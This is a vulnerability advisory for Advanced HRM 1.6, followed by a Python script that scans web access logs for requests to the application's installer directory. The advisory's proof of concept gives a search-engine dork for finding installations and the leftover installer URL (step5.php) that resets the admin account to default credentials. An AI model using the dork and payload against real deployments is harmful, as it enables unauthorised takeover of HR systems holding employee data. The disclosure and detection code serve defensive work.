Advanced HRM 1.6 Insecure Direct Object Reference
Advanced HRM version 1.6 allows the administrative password to be reset by an unauthenticated visitor.
====================================================================================================
# Title     : Advanced HRM v1.6 Reset admin login Vulnerability
# Author    : indoushka
# Tested on : Windows 10 Français (Pro) / browser: Mozilla Firefox 62.0.3 (32-bit)
# Vendor    : https://codecanyon.net/item/advanced-hrm/17767006
# Dork      : "Copyright © CoderPixel 2016 All Rights Reserved"
====================================================================================================

PoC:

[+] Dorking in Google or another search engine.
[+] The vulnerability is that the installer script remains reachable after installation; requesting it resets the script settings and sets a new password for the admin account.
[+] Use payload: /application/install/step5.php
[+] http://127.0.0.1/appchain.commy/hrm/application/install/step5.php
[+] Congratulations! You have just install Advance HRM! To Login Admin Portal: Use this link - http://127.0.0.1/appchain.commy/hrm/ Username: admin Password: admin.password

Greetings to:
====================================================================================================
jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * shadow_00715 * yasMouh
====================================================================================================
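As an added defender-side example (not part of this advisory and not the vendor's code), the following script scans web server access log lines for any request that reaches the Advanced HRM installer directory named above. It assumes the logs are in Apache/nginx combined format and that the application is installed under a URL prefix such as /hrm/; the log lines themselves are constructed for the example. A hit on step5.php that returned 200 after installation is treated as critical, because that is the step the advisory shows resetting the admin credentials; any other installer path is flagged as a warning.

```python
import re
from typing import Dict, Iterable, List, Optional

# Apache/nginx "combined" log format (assumption: the server logs this way).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Installer directory from the advisory. After setup, nothing legitimate
# should request it.
INSTALL_DIR_RE = re.compile(r'/application/install/')

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2018:13:55:36 +0000] "GET /hrm/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2018:13:55:40 +0000] "GET /hrm/application/install/step5.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2018:14:01:02 +0000] "GET /hrm/application/install/step1.php?x=1 HTTP/1.1" 403 199 "-" "curl/7.61"
192.0.2.9 - - [10/Oct/2018:14:05:00 +0000] "POST /hrm/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format log line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_installer_hits(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return every entry that touched the installer directory.

    step5.php answered with 200 is 'critical' (the reset step actually ran);
    any other installer request, including blocked ones, is a 'warning'
    because someone is probing for the installer.
    """
    hits: List[Dict[str, str]] = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        path = entry["path"].split("?", 1)[0]  # ignore the query string
        if not INSTALL_DIR_RE.search(path):
            continue
        reset_ran = path.endswith("/step5.php") and entry["status"] == "200"
        entry["severity"] = "critical" if reset_ran else "warning"
        hits.append(entry)
    return hits


def summarize(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count hits by severity, e.g. {'critical': 1, 'warning': 1}."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["severity"]] = counts.get(h["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_installer_hits(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'{h["severity"]:8} {h["ip"]:14} {h["status"]} {h["method"]} {h["path"]}')
    print("summary:", summarize(found))
```

Run it against a real access log by passing the file's lines to `find_installer_hits`. A critical hit means the admin credentials should be assumed reset to the defaults shown in the advisory and changed immediately. The lasting fix is to remove the install directory once setup is finished, or deny it at the web server, so the installer cannot be reached again.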